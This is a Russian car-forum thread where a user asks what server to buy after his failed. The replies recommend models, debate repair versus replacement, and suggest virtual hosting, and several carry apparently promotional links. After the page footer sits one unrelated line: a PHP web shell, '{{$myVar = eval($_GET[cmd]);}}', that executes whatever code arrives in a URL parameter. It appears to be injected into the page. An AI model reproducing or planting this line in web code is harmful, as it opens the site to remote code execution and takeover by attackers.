+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Сервер


  1. #1
    Мимо проходил Томас is on a distinguished road Аватар для Томас
    Регистрация
    22.07.2020
    Откуда
    СНГ
    Машина
    Бричка
    Сообщений
    7

    Сервер

    Привет. У меня неожиданно сломался сервер, а без него моя компания не может полноценно работать. Так что нужно срочно покупать новый. Кто знает, какой конкретно сервер мне стоит выбрать, и где его вообще искать? Для меня главное только его надежность

  2. #2
    Мимо проходил Мэтью is on a distinguished road Аватар для Мэтью
    Регистрация
    09.06.2020
    Откуда
    СНГ
    Машина
    Бричка
    Сообщений
    12
    Вполне надежным сервером является модель ProLiant DL360e Gen8 https://www.hpe-russia.ru.com/hpeser...360e-gen8.html В нем предусмотренный удаленный доступ, так что не будет потребности в поддержке по месту установки. Нужно отметить что он оснащен двумя достаточно мощным процессорами Intel Xeon E5-2400

  3. #3
    Мимо проходил Александр Волощук is on a distinguished road Аватар для Александр Волощук
    Регистрация
    21.08.2019
    Откуда
    СНГ
    Машина
    Бричка
    Сообщений
    14
    А почему вы сразу решили покупать новый сервер? Может удастся отремонтировать старый. Вот на такие случаи в вашей компании должен быть человек, который будет заниматься непосредственно обслуживанием такой техники.

  4. #4
    Мимо проходил Александр Крут is on a distinguished road Аватар для Александр Крут
    Регистрация
    10.06.2020
    Откуда
    СНГ
    Машина
    Бричка
    Сообщений
    11
    Пытаться ремонтировать сломанный сервер нерационально. Он периодически будет выходить из строя, этого уже не избежать. А насчет специалиста в штате компании я полностью согласен с предыдущим автором

  5. #5
    Мимо проходил Samuil is on a distinguished road Аватар для Samuil
    Регистрация
    16.12.2018
    Сообщений
    78
    Вообще с физическими серверами многие компании давно не работают. Мы в свое время отказались, поскольку столкнулись с ситуацией, когда в рамках одной весьма серьезной проверки у нас просто этот сервер изъяли. Так что подумайте, может быть, аренда виртуального сервера в той же Германии будет выгоднее в плане безопасности https://master-server.pro/server-de

  6. #6
    Мимо проходил Бормен is on a distinguished road Аватар для Бормен
    Регистрация
    15.12.2018
    Машина
    Б/у
    Сообщений
    75
    Цитата Сообщение от Александр Крут Посмотреть сообщение
    Пытаться ремонтировать сломанный сервер нерационально. Он периодически будет выходить из строя, этого уже не избежать. А насчет специалиста в штате компании я полностью согласен с предыдущим автором
    А вот это совершенная неправда. Отремонтированный сервер может еще спокойно лет 10 проработать, а купленный на замену сломавшемуся накроется через месяц. Всякое бывает, короче.

  7. #7
    Мимо проходил Нибелунг is on a distinguished road Аватар для Нибелунг
    Регистрация
    14.12.2018
    Откуда
    Самый лучший на Земле
    Сообщений
    68
    Да все дело в том, что как физические, так и виртуальные сервера требуют постоянного обслуживания. Многие по этому поводу вообще не парятся, а потом происходят такие ситуации, как описывает автор. Так что не стоит игнорировать обслуживание серверов. Так что если вы из Москвы, могу порекомендовать вот тут узнать, сколько стоит эта услуга https://afforto.ru/services/serverni...anie_serverov/

  8. #8
    GTI-Racing lebed_art is on a distinguished road Аватар для lebed_art
    Регистрация
    15.04.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    274
    Ну а вы хоть понимаете что такое сервер и где он именно находится? Есть же реально хорошие сервера, дата центры и днс серверы. Читайте https://deltahost.ua/ua/shho-take-dns-server.html очень хорошо написанную статью про сервера и какие они бывают в 21 веке вообще. Какие еще бывают сервера вы в курсе? VPS знаете?

+ Ответить в теме

Похожие темы

  1. Облачный сервер
    от Фиил в разделе Барахолка
    Ответов: 6
    Последнее сообщение: 03.04.2024, 06:15
  2. сервер
    от dasa в разделе Реклама
    Ответов: 6
    Последнее сообщение: 03.04.2024, 05:49
  3. Сервер
    от Логопед в разделе Реклама
    Ответов: 11
    Последнее сообщение: 04.01.2024, 12:39
  4. Выделенный сервер
    от Niol в разделе Курилка
    Ответов: 2
    Последнее сообщение: 29.01.2021, 18:50
  5. Выделенный сервер
    от Patootie в разделе Разное
    Ответов: 6
    Последнее сообщение: 26.11.2020, 19:54

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}